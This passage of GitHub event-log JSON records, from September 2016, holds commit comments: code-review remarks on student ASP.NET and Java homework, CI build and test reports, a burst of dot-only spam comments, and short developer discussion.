file.\r\nCodeSample_UpdateProjectCustomFieldValues-Rest.txt<https://na01.safelinks.protection.outlook.com/?url=https%3a%2f%2fgithub.com%2fOfficeDev%2fProject-REST-Basic-Operations%2ffiles%2f474911%2fCodeSample_UpdateProjectCustomFieldValues-Rest.txt&data=02%7c01%7cv-ribix%40microsoft.com%7c0f3dc99e81fc4d6e727308d3dd77d071%7c72f988bf86f141af91ab2d7cd011db47%7c1%7c0%7c636095479067091434&sdata=0qF7sI4Zw6W0NWBUmsTpvae6DhTeRN17wGBFJAhXVzE%3d>\r\n\r\n—\r\nYou are receiving this because you are subscribed to this thread.\r\nReply to this email directly, view it on GitHub<https://na01.safelinks.protection.outlook.com/?url=https%3a%2f%2fgithub.com%2fOfficeDev%2fProject-REST-Basic-Operations%2fcommit%2f022cc2156157ff41450086e1cf5f07b55d6f2a8e%23commitcomment-19037784&data=02%7c01%7cv-ribix%40microsoft.com%7c0f3dc99e81fc4d6e727308d3dd77d071%7c72f988bf86f141af91ab2d7cd011db47%7c1%7c0%7c636095479067091434&sdata=Ja9I4dwCFhlBjo8myVKLcF6n1LTQXFLP%2bKU7RibEkXY%3d>, or mute the thread<https://na01.safelinks.protection.outlook.com/?url=https%3a%2f%2fgithub.com%2fnotifications%2funsubscribe-auth%2fARl5_BwwehpTJpSurZGENK82E0oBo2lGks5qqVuAgaJpZM4JpUkY&data=02%7c01%7cv-ribix%40microsoft.com%7c0f3dc99e81fc4d6e727308d3dd77d071%7c72f988bf86f141af91ab2d7cd011db47%7c1%7c0%7c636095479067091434&sdata=bSqy%2bL3Bg%2b%2bY%2bs54C60mkFsRp2nnPS0ZvVU0DgWJn2s%3d>.\r\n"}},"created_at":"2016-09-15T18:11:40Z"}
{"id":"4569770051","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"CreatorLin/SkillTreeMVC5Homework"},"payload":{"comment":{"id":19041485,"position":13,"line":9,"path":"Homework1/Homework1/Areas/Power/Controllers/AccountBookController.cs","commit_id":"7655cebf890a42c686a5f7089dd8bdf50f44763c","created_at":"2016-09-15T18:12:27Z","updated_at":"2016-09-15T18:12:27Z","body":"你只有用 Authorize 這表示「有登入」不能代表「管理員」"}},"created_at":"2016-09-15T18:12:27Z"}
{"id":"4569776199","type":"CommitCommentEvent","actor":{"login":"jdonaldson"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19041498,"position":null,"line":null,"path":null,"commit_id":"7f0801c4a442a03cd027937f8e90393329a38642","created_at":"2016-09-15T18:13:29Z","updated_at":"2016-09-15T18:13:29Z","body":"I'm also going to add a guard against returning multireturn types from a \"normal\" haxe function.  "}},"created_at":"2016-09-15T18:13:29Z"}
{"id":"4569777925","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19041508,"position":null,"line":null,"path":null,"commit_id":"e9494152e977644bec904d68abc52c1067e8de48","created_at":"2016-09-15T18:13:48Z","updated_at":"2016-09-15T18:13:48Z","body":"versionNumbers (mitchute) - Win64-Windows-7-VisualStudio-12: OK (2336 of 2336 tests passed, 21 test warnings)\n\n * 21 tests had: EIO diffs.\n * 21 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9494152e977644bec904d68abc52c1067e8de48-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T18:13:48Z"}
{"id":"4569778071","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"CreatorLin/SkillTreeMVC5Homework"},"payload":{"comment":{"id":19041509,"position":38,"line":73,"path":"Homework1/Homework1/Controllers/MoneyController.cs","commit_id":"27f643da18a9e4402a4802ddd758646352ac7654","created_at":"2016-09-15T18:13:50Z","updated_at":"2016-09-15T18:13:50Z","body":"你的 dbData 已經 toList 了，所以分頁毫無意義，你這樣等於是把一千筆都抓出來以後再顯示10筆\r\n"}},"created_at":"2016-09-15T18:13:50Z"}
{"id":"4569778974","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":19041512,"position":null,"line":null,"path":null,"commit_id":"e9e1cc558f54e6838b362dfb02cc52b28737d323","created_at":"2016-09-15T18:13:59Z","updated_at":"2016-09-15T18:13:59Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-logRefactoring.38](http://build.prxm.it:8813/viewLog.html?buildId=3659&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 250 Build time: 00:01:22"}},"created_at":"2016-09-15T18:13:59Z"}
{"id":"4569784218","type":"CommitCommentEvent","actor":{"login":"AlecKC"},"repo":{"name":"illinois-cs241/illinois-cs241.github.io"},"payload":{"comment":{"id":19041537,"position":null,"line":null,"path":null,"commit_id":"c3a40a8caba9adcf13e420644d1d8ea82815a171","created_at":"2016-09-15T18:14:54Z","updated_at":"2016-09-15T18:14:54Z","body":"Well, they also have to return the pointer"}},"created_at":"2016-09-15T18:14:54Z"}
{"id":"4569784507","type":"CommitCommentEvent","actor":{"login":"dakrone"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19041538,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-15T18:14:56Z","updated_at":"2016-09-15T18:14:56Z","body":"@joelittlejohn I think those sound good to me if you want to send a PR!"}},"created_at":"2016-09-15T18:14:56Z"}
{"id":"4569785863","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"rdd0703/Day1Homework"},"payload":{"comment":{"id":19041543,"position":5,"line":24,"path":"Day1Homework/Day1Homework/Models/ViewModels/MyViewModel.cs","commit_id":"8ab48ab15bbb47ad87da47b8f7e457da21f13bde","created_at":"2016-09-15T18:15:13Z","updated_at":"2016-09-15T18:15:13Z","body":"其實我不太懂你堅持用 MaxValue 的用意，身為一個記帳本不太需要記錄到那麼大的值"}},"created_at":"2016-09-15T18:15:13Z"}
{"id":"4569788845","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"shb2304/java_pft"},"payload":{"comment":{"id":19041561,"position":11,"line":13,"path":"sandbox/src/main/java/ru/stqa/pft/sandbox/MyFirstProgram.java","commit_id":"2a8d97d1d983c37d2799cb32a2477ba7fb16746e","created_at":"2016-09-15T18:15:41Z","updated_at":"2016-09-15T18:15:41Z","body":"System.out.println(\"Расстояние между точками p1(\"+p1.x+\"; \"+p1.y+\") и p2(\"+p2.x+\"; \"+p2.y+\") = \" + p2.distance(p1)); // так у вас и нет пробелов, надо так\r\n"}},"created_at":"2016-09-15T18:15:41Z"}
{"id":"4569788943","type":"CommitCommentEvent","actor":{"login":"samselikoff"},"repo":{"name":"samselikoff/ember-cli-mirage"},"payload":{"comment":{"id":19041562,"position":null,"line":null,"path":null,"commit_id":"ef5744a0db17dba87831c1ac9cfd0f4695cca865","created_at":"2016-09-15T18:15:42Z","updated_at":"2016-09-15T18:15:42Z","body":":) going to get a revamp now with Projects and Notes, hoping to make time this weekend. Finally a place to put non-actionable issues!\r\n\r\nBtw canvas is an amazing app, thanks for the reco."}},"created_at":"2016-09-15T18:15:42Z"}
{"id":"4569791984","type":"CommitCommentEvent","actor":{"login":"ProfessorKaos64"},"repo":{"name":"cecton/aur-libretro-quicknes-git"},"payload":{"comment":{"id":19041569,"position":null,"line":null,"path":null,"commit_id":"448ae19c54f2cefbdb6007ff058e72f236f308a8","created_at":"2016-09-15T18:16:15Z","updated_at":"2016-09-15T18:16:15Z","body":"Not sure if genuine or sarcastic hmmm. I'll take it. :neckbeard: "}},"created_at":"2016-09-15T18:16:15Z"}
{"id":"4569792856","type":"CommitCommentEvent","actor":{"login":"gmpreussner"},"repo":{"name":"videolan/vlc"},"payload":{"comment":{"id":19041571,"position":null,"line":null,"path":null,"commit_id":"c220ddc927d1a97f72a0c5bf86de56301e3483ad","created_at":"2016-09-15T18:16:24Z","updated_at":"2016-09-15T18:16:24Z","body":"If you call SetDefaultDllDirectory with the desired flags in VLC's main, then the rest should still work with the same security features. The remaining code of your commit will work as it does now, and libvlc and libvlcore will load fine due to LOAD_LIBRARY_SEARCH_APPLICATION_DIR. The only difference is that the choice of application's security restrictions is decided by the application, not the library, as it should be imho."}},"created_at":"2016-09-15T18:16:24Z"}
{"id":"4569794810","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19041576,"position":null,"line":null,"path":null,"commit_id":"ba89d6243c20dba61cf8a467af7f244fa642f21d","created_at":"2016-09-15T18:16:44Z","updated_at":"2016-09-15T18:16:44Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [source/_partials/footer_scripts.html](https://github.com/pantheon-systems/documentation/commit/ba89d6243c20dba61cf8a467af7f244fa642f21d/source/_partials/footer_scripts.html)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/ba89d6243c20dba61cf8a467af7f244fa642f21d/source/docs/assets/js/main.js)\n"}},"created_at":"2016-09-15T18:16:44Z"}
{"id":"4569794929","type":"CommitCommentEvent","actor":{"login":"belfastraven"},"repo":{"name":"airend/android_kernel_bn_omap"},"payload":{"comment":{"id":19041577,"position":null,"line":null,"path":null,"commit_id":"4949a000f08cb397e11df66e6b9a75c9020b1680","created_at":"2016-09-15T18:16:45Z","updated_at":"2016-09-15T18:16:45Z","body":"Yes I know,  and haven't had a problem compiling once I realized where the sources needed to be .  I think I thought I had seen the config changes in the 3.4/nookd kernel also, and obviously I hadn't.    Back to the drawing board............  "}},"created_at":"2016-09-15T18:16:45Z"}
{"id":"4569795945","type":"CommitCommentEvent","actor":{"login":"demofan"},"repo":{"name":"rdd0703/Day1Homework"},"payload":{"comment":{"id":19041580,"position":11,"line":29,"path":"Day1Homework/Day1Homework/Areas/Admin/Controllers/HomeController.cs","commit_id":"cedbecb19d87b2ef65bd02f5bc75392fa0c01b57","created_at":"2016-09-15T18:16:56Z","updated_at":"2016-09-15T18:16:56Z","body":"轉型是很耗效能的，你在上面處理的時候直接給一個變數，下面就可以直接用了，況且你把 pageIndex 和 pageSize 傳到前面幹啥？\r\n\r\nIPagedList<T> 都取的到這些值"}},"created_at":"2016-09-15T18:16:56Z"}
{"id":"4569796832","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"Kirezzz/java_programming"},"payload":{"comment":{"id":19041583,"position":11,"line":15,"path":"sandbox/src/main/java/ru/stqa/java/sandbox/Point.java","commit_id":"7f70c1c123d4d2eb056f6e859c7fda7697b09e26","created_at":"2016-09-15T18:17:06Z","updated_at":"2016-09-15T18:17:06Z","body":"   public static double distance(Point p2) {\r\n     return Math.sqrt(Math.pow(p2.x - this.x, 2) + Math.pow(p2.y - this.y, 2));\r\n   }"}},"created_at":"2016-09-15T18:17:06Z"}
{"id":"4569799810","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041590,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:17:35Z","updated_at":"2016-09-15T18:17:35Z","body":"................"}},"created_at":"2016-09-15T18:17:35Z"}
{"id":"4569800458","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041594,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:17:41Z","updated_at":"2016-09-15T18:17:41Z","body":".........\r\n\r\n"}},"created_at":"2016-09-15T18:17:41Z"}
{"id":"4569800907","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041595,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:17:46Z","updated_at":"2016-09-15T18:17:46Z","body":"..........."}},"created_at":"2016-09-15T18:17:46Z"}
{"id":"4569801549","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041597,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:17:52Z","updated_at":"2016-09-15T18:17:52Z","body":".............."}},"created_at":"2016-09-15T18:17:52Z"}
{"id":"4569802120","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041599,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:17:58Z","updated_at":"2016-09-15T18:17:58Z","body":".................."}},"created_at":"2016-09-15T18:17:58Z"}
{"id":"4569802869","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041601,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:18:06Z","updated_at":"2016-09-15T18:18:06Z","body":"....,...."}},"created_at":"2016-09-15T18:18:06Z"}
{"id":"4569803399","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19041602,"position":null,"line":null,"path":null,"commit_id":"b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7","created_at":"2016-09-15T18:18:12Z","updated_at":"2016-09-15T18:18:12Z","body":"os_2_0_develop (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T18:18:12Z"}
{"id":"4569803402","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041603,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:18:12Z","updated_at":"2016-09-15T18:18:12Z","body":".............\r\n.\r\n."}},"created_at":"2016-09-15T18:18:12Z"}
{"id":"4569804208","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041606,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:18:19Z","updated_at":"2016-09-15T18:18:19Z","body":".........."}},"created_at":"2016-09-15T18:18:19Z"}
{"id":"4569805610","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041607,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:18:33Z","updated_at":"2016-09-15T18:18:33Z","body":".........."}},"created_at":"2016-09-15T18:18:33Z"}
{"id":"4569806342","type":"CommitCommentEvent","actor":{"login":"Megatron007"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041611,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:18:39Z","updated_at":"2016-09-15T18:18:39Z","body":"................"}},"created_at":"2016-09-15T18:18:39Z"}
{"id":"4569807463","type":"CommitCommentEvent","actor":{"login":"cecton"},"repo":{"name":"cecton/aur-libretro-quicknes-git"},"payload":{"comment":{"id":19041619,"position":null,"line":null,"path":null,"commit_id":"448ae19c54f2cefbdb6007ff058e72f236f308a8","created_at":"2016-09-15T18:18:50Z","updated_at":"2016-09-15T18:18:50Z","body":"Naaah :+1: don't worry! Thanks for your contribution :) If you want to maintain the packet yourself it's fine by me. I just re-added a bunch of stuff that I needed and that were deleted because orphaned for too long."}},"created_at":"2016-09-15T18:18:50Z"}
{"id":"4569812120","type":"CommitCommentEvent","actor":{"login":"gau-veldt"},"repo":{"name":"gau-veldt/OmegaRising"},"payload":{"comment":{"id":19041632,"position":null,"line":null,"path":null,"commit_id":"706b9d1d801e0af003e3a500e22537eac3087539","created_at":"2016-09-15T18:19:39Z","updated_at":"2016-09-15T18:19:39Z","body":"Couple of screen shots to see what's going on:\r\n\r\nClient:\r\n![screenshot_c](https://cloud.githubusercontent.com/assets/1862162/18561759/11bd7e78-7b36-11e6-9eee-23d1d9c45e52.png)\r\n\r\n\r\nSever (character template):\r\n![screenshot_t](https://cloud.githubusercontent.com/assets/1862162/18561768/17ae8a02-7b36-11e6-8252-c9dac3e6646d.png)\r\n\r\n"}},"created_at":"2016-09-15T18:19:39Z"}
{"id":"4569812568","type":"CommitCommentEvent","actor":{"login":"comedinha"},"repo":{"name":"otland/forgottenserver"},"payload":{"comment":{"id":19041634,"position":64,"line":134,"path":"src/monsters.h","commit_id":"33d074fe1cb28d7f094e0e6896ada65d9cd472a2","created_at":"2016-09-15T18:19:43Z","updated_at":"2016-09-15T18:19:43Z","body":"space"}},"created_at":"2016-09-15T18:19:43Z"}
{"id":"4569812578","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19041635,"position":null,"line":null,"path":null,"commit_id":"d6bbb919505ce78055fda0c6b3b18262c82cbe8f","created_at":"2016-09-15T18:19:43Z","updated_at":"2016-09-15T18:19:43Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#PhMFVw55RVmVYyv456xJ_Q"}},"created_at":"2016-09-15T18:19:43Z"}
{"id":"4569813154","type":"CommitCommentEvent","actor":{"login":"zeeshanhussain"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041638,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:19:49Z","updated_at":"2016-09-15T18:19:49Z","body":"jobless^?"}},"created_at":"2016-09-15T18:19:49Z"}
{"id":"4569815159","type":"CommitCommentEvent","actor":{"login":"david2050"},"repo":{"name":"david2050/helloworld"},"payload":{"comment":{"id":19041644,"position":9,"line":0,"path":"teste.php","commit_id":"addd06c19c7ede41ee7ed58d584362cc5cef8945","created_at":"2016-09-15T18:20:11Z","updated_at":"2016-09-15T18:20:11Z","body":"Teste"}},"created_at":"2016-09-15T18:20:11Z"}
{"id":"4569816544","type":"CommitCommentEvent","actor":{"login":"david2050"},"repo":{"name":"david2050/helloworld"},"payload":{"comment":{"id":19041650,"position":null,"line":null,"path":null,"commit_id":"addd06c19c7ede41ee7ed58d584362cc5cef8945","created_at":"2016-09-15T18:20:24Z","updated_at":"2016-09-15T18:20:24Z","body":"Ok"}},"created_at":"2016-09-15T18:20:24Z"}
{"id":"4569819096","type":"CommitCommentEvent","actor":{"login":"TheScarastic"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041662,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:20:48Z","updated_at":"2016-09-15T18:20:48Z","body":"@Megatron007 stop it,  @ashwinr64 so afraid of sanyam o_O tht even without his single comment you blamed him ahh my bad every kanger fears him xD"}},"created_at":"2016-09-15T18:20:48Z"}
{"id":"4569819396","type":"CommitCommentEvent","actor":{"login":"hcook"},"repo":{"name":"ucb-bar/rocket-chip"},"payload":{"comment":{"id":19041663,"position":null,"line":null,"path":null,"commit_id":"f363f5f7094436b05e3db26e3fcba8b47648effb","created_at":"2016-09-15T18:20:51Z","updated_at":"2016-09-15T18:20:51Z","body":"Why is this in TestHarness and not package util?"}},"created_at":"2016-09-15T18:20:51Z"}
{"id":"4569819881","type":"CommitCommentEvent","actor":{"login":"ProfessorKaos64"},"repo":{"name":"cecton/aur-libretro-quicknes-git"},"payload":{"comment":{"id":19041667,"position":null,"line":null,"path":null,"commit_id":"448ae19c54f2cefbdb6007ff058e72f236f308a8","created_at":"2016-09-15T18:20:56Z","updated_at":"2016-09-15T18:20:56Z","body":"package you mean? It's ok. You can add me as a container if you wish. I can give another set of eyes on things. Keep up the great work sir/madam :cake: "}},"created_at":"2016-09-15T18:20:56Z"}
{"id":"4569820695","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19041669,"position":null,"line":null,"path":null,"commit_id":"b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7","created_at":"2016-09-15T18:21:04Z","updated_at":"2016-09-15T18:21:04Z","body":"os_2_0_develop (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7e0cf82c24f5bf6dfd56ac7d605ea37cf8fe6e7-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T18:21:04Z"}
{"id":"4569824047","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19041689,"position":null,"line":null,"path":null,"commit_id":"35d3cb27f567e65dd779ca858421725ab2f6e07b","created_at":"2016-09-15T18:21:37Z","updated_at":"2016-09-15T18:21:37Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35472/testReport/) for this commit**"}},"created_at":"2016-09-15T18:21:37Z"}
{"id":"4569824388","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19041692,"position":6,"line":39,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/view/ScheduleViewMB.java","commit_id":"1692af5f92a2f83b37176af46350031229f11522","created_at":"2016-09-15T18:21:41Z","updated_at":"2016-09-15T18:21:41Z","body":"We don't need sample events. Remove them."}},"created_at":"2016-09-15T18:21:41Z"}
{"id":"4569827555","type":"CommitCommentEvent","actor":{"login":"mrakitin"},"repo":{"name":"radiasoft/sirepo"},"payload":{"comment":{"id":19041701,"position":null,"line":null,"path":null,"commit_id":"78454e1f472da5c49acbdd74b1d25bec03b8e3b4","created_at":"2016-09-15T18:22:12Z","updated_at":"2016-09-15T18:22:12Z","body":"@moellep, does it solve https://github.com/radiasoft/sirepo/issues/372?"}},"created_at":"2016-09-15T18:22:12Z"}
{"id":"4569828193","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19041707,"position":null,"line":null,"path":null,"commit_id":"21642da760108783f0863c661f454dcb3b70e9a4","created_at":"2016-09-15T18:22:18Z","updated_at":"2016-09-15T18:22:18Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/473/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T18:22:18Z"}
{"id":"4569831164","type":"CommitCommentEvent","actor":{"login":"hcook"},"repo":{"name":"ucb-bar/rocket-chip"},"payload":{"comment":{"id":19041711,"position":null,"line":null,"path":null,"commit_id":"f5db83a72ff2938cbd10a16ceadf630f9f366961","created_at":"2016-09-15T18:22:45Z","updated_at":"2016-09-15T18:22:45Z","body":"Why not? I'll grant that the Knobs/Parameters distinction has gotten pretty arbitrary, but why remove only this one?"}},"created_at":"2016-09-15T18:22:45Z"}
{"id":"4569834701","type":"CommitCommentEvent","actor":{"login":"hellogerard"},"repo":{"name":"jsdf/react-native-htmlview"},"payload":{"comment":{"id":19041723,"position":null,"line":null,"path":null,"commit_id":"da950adba429bfb4938c4769fdea3f07bc7bab5b","created_at":"2016-09-15T18:23:19Z","updated_at":"2016-09-15T18:23:19Z","body":"Can we get this published on npm?"}},"created_at":"2016-09-15T18:23:19Z"}
{"id":"4569840805","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19041736,"position":4,"line":53,"path":"band-web/src/main/webapp/publicbandprofile.xhtml","commit_id":"1692af5f92a2f83b37176af46350031229f11522","created_at":"2016-09-15T18:24:21Z","updated_at":"2016-09-15T18:24:21Z","body":"Why? One calendar wasn't enough?"}},"created_at":"2016-09-15T18:24:21Z"}
{"id":"4569842622","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19041741,"position":16,"line":49,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/view/ScheduleViewMB.java","commit_id":"1692af5f92a2f83b37176af46350031229f11522","created_at":"2016-09-15T18:24:38Z","updated_at":"2016-09-15T18:24:38Z","body":"We don't need sample events."}},"created_at":"2016-09-15T18:24:38Z"}
{"id":"4569843284","type":"CommitCommentEvent","actor":{"login":"joelittlejohn"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19041744,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-15T18:24:45Z","updated_at":"2016-09-15T18:24:45Z","body":"If anyone can think of a better name for the option, please do shout :)"}},"created_at":"2016-09-15T18:24:45Z"}
{"id":"4569845487","type":"CommitCommentEvent","actor":{"login":"dambergurung"},"repo":{"name":"dambergurung/hello-world"},"payload":{"comment":{"id":19041754,"position":null,"line":null,"path":null,"commit_id":"4612f0b53257d952e8248e34a2a3b7fb6cc68e09","created_at":"2016-09-15T18:25:07Z","updated_at":"2016-09-15T18:25:07Z","body":"fdgfdgdfdg"}},"created_at":"2016-09-15T18:25:07Z"}
{"id":"4569847186","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19041758,"position":null,"line":null,"path":null,"commit_id":"f89c0c05c47cf34de3d5d93062d9040ed51a9cba","created_at":"2016-09-15T18:25:23Z","updated_at":"2016-09-15T18:25:23Z","body":"A upgrade from 2.7.11 to 2.7.12 is not working.\r\nThat change requires all people to reflash. Should be done on new release due to that."}},"created_at":"2016-09-15T18:25:23Z"}
{"id":"4569847648","type":"CommitCommentEvent","actor":{"login":"Bunny67"},"repo":{"name":"ElvUI-WotLK/ElvUI"},"payload":{"comment":{"id":19041759,"position":null,"line":null,"path":null,"commit_id":"4233ef72d2eb1d0b5ffddd83380e81dace3bf7b7","created_at":"2016-09-15T18:25:27Z","updated_at":"2016-09-15T18:25:27Z","body":"\"Local Time\" Will not work"}},"created_at":"2016-09-15T18:25:27Z"}
{"id":"4569847735","type":"CommitCommentEvent","actor":{"login":"dambergurung"},"repo":{"name":"dambergurung/hello-world"},"payload":{"comment":{"id":19041760,"position":null,"line":null,"path":null,"commit_id":"4612f0b53257d952e8248e34a2a3b7fb6cc68e09","created_at":"2016-09-15T18:25:27Z","updated_at":"2016-09-15T18:25:27Z","body":"ffghfhfdhf\r\n"}},"created_at":"2016-09-15T18:25:27Z"}
{"id":"4569849307","type":"CommitCommentEvent","actor":{"login":"maxl85"},"repo":{"name":"maxl85/Borex"},"payload":{"comment":{"id":19041764,"position":4,"line":19,"path":"Borex/BorexServer.cs","commit_id":"1e164145f0b6edf495561520cc5d88430e866adc","created_at":"2016-09-15T18:25:41Z","updated_at":"2016-09-15T18:25:41Z","body":"www"}},"created_at":"2016-09-15T18:25:41Z"}
{"id":"4569850175","type":"CommitCommentEvent","actor":{"login":"Martinusbe"},"repo":{"name":"sud-vastav/android_device_oneplus_onyx"},"payload":{"comment":{"id":19041769,"position":null,"line":null,"path":null,"commit_id":"36966fd3a7caced28fea663d77847f55dad7a71c","created_at":"2016-09-15T18:25:49Z","updated_at":"2016-09-15T18:25:49Z","body":"having fun?"}},"created_at":"2016-09-15T18:25:49Z"}
{"id":"4569851079","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19041771,"position":null,"line":null,"path":null,"commit_id":"f89c0c05c47cf34de3d5d93062d9040ed51a9cba","created_at":"2016-09-15T18:25:59Z","updated_at":"2016-09-15T18:25:59Z","body":"for 5.3 we dont change any, new image coming with all new features"}},"created_at":"2016-09-15T18:25:59Z"}
